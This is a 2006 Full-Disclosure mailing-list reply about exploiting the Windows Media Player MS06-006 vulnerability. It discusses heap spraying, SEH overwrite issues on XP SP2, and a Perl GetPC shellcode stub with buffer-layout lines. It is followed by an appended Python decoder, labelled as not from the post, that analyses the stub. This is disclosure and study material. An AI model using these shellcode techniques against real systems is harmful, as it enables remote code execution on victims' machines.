Re: MS06-06 Windows Media Player Exploitation [CODE]
From: H D Moore <fdlist () digitaloffense net>
Date: Fri, 17 Feb 2006 08:20:28 -0600
On Friday 17 February 2006 02:05, Matthew Murphy wrote:
Interesting issue with regards to the module-list pointers.
[ snip ]
The heap spray technique works very effectively -- you end up with a
*sizable* pad in the 0x04a00000 region which you can use as a direct
jump point for the payload, without any of the fancy frame manipulation
tricks that I am too tired to try at this hour of the night/morning.
This should also be (theoretically) version-independent. Thanks to the
similarities of the heap management APIs and the fact that most DLLs
from MS use high bases, I'd bet money that this works across WMP
versions on anything from NT 4.0 to 2003.
I ran into problems with Skylined's alphanumeric GetPC code - on Windows
XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our
shellcode is one, since we smash SEH on the way down). Did some fancy
8086 instructions to get around this (thanks vlad902 - the human
assembler), so, fwiw:
my $getpc =
    "\x58\x58\x58".           # pop eax; pop eax; pop eax
    "\x05\x18\x29\x29\x29".   # add eax, 0x29292918
    "\x2d\x01\x29\x29\x29".   # sub eax, 0x29292901  (net: eax += 0x17)
    "\x50\x59";               # push eax; pop ecx

# "ABC=" decodes as inc ecx; inc edx; inc ebx; cmp eax, imm32 - the cmp
# consumes the 4 address bytes that follow as its immediate, so they are
# never executed as instructions
substr($pattern, 2082, 4, "ABC=");
substr($pattern, 2086, 4, pack('V', $addr));   # the address (cmp's imm32)
substr($pattern, 2090, length($getpc), $getpc);
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);
It's likely, as well, that this one technique works on any script-enabled
browser that supports the plugin with the same results.
I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some
more time I will play with the heap spray method and see if that works
cross-browser/os/version as well. Looks like heap spray is the way to go,
at least for Firefox...
'Nuff teasing. Code attached. It is important to note that you should
read the inline disclaimer *BEFORE* using the code.
Thanks for sharing!
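As an added example (not code from the post or from either author), a small Python decoder for the opcode subset the stub above uses: it confirms that "ABC=" turns the four address bytes into the immediate operand of a cmp rather than executable code, and computes the net eax adjustment the add/sub pair produces. The address 0x04a00000 below is a placeholder taken from the region mentioned in the thread, not the exploit's real value.

```python
import struct

# Constructed copies of the byte strings from the post; the address is a
# placeholder for this example, not the value the exploit used.
GETPC = (b"\x58\x58\x58"
         + b"\x05\x18\x29\x29\x29"
         + b"\x2d\x01\x29\x29\x29"
         + b"\x50\x59")
ADDR_SLOT = b"ABC=" + struct.pack("<I", 0x04A00000)

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
IMM32_OPS = {0x05: "add", 0x2D: "sub", 0x3D: "cmp"}  # short forms on eax


def decode(code: bytes):
    """Decode the tiny subset used by the stub: one-byte inc/push/pop and
    the eax, imm32 forms of add/sub/cmp. Returns (mnemonic, operand) pairs."""
    insns, i = [], 0
    while i < len(code):
        op = code[i]
        if 0x40 <= op <= 0x47:
            insns.append(("inc", REGS[op - 0x40])); i += 1
        elif 0x50 <= op <= 0x57:
            insns.append(("push", REGS[op - 0x50])); i += 1
        elif 0x58 <= op <= 0x5F:
            insns.append(("pop", REGS[op - 0x58])); i += 1
        elif op in IMM32_OPS:
            if i + 5 > len(code):
                raise ValueError("truncated imm32 at offset %d" % i)
            imm = struct.unpack_from("<I", code, i + 1)[0]
            insns.append((IMM32_OPS[op], imm)); i += 5
        else:
            raise ValueError("opcode 0x%02x at offset %d not handled" % (op, i))
    return insns


def eax_adjustment(insns):
    """Net constant the add/sub instructions apply to eax (mod 2**32)."""
    delta = 0
    for mnemonic, operand in insns:
        if mnemonic == "add":
            delta += operand
        elif mnemonic == "sub":
            delta -= operand
    return delta & 0xFFFFFFFF


def has_null_byte(code: bytes) -> bool:
    """Quick check for a byte that string-based delivery would truncate on."""
    return b"\x00" in code
```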
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/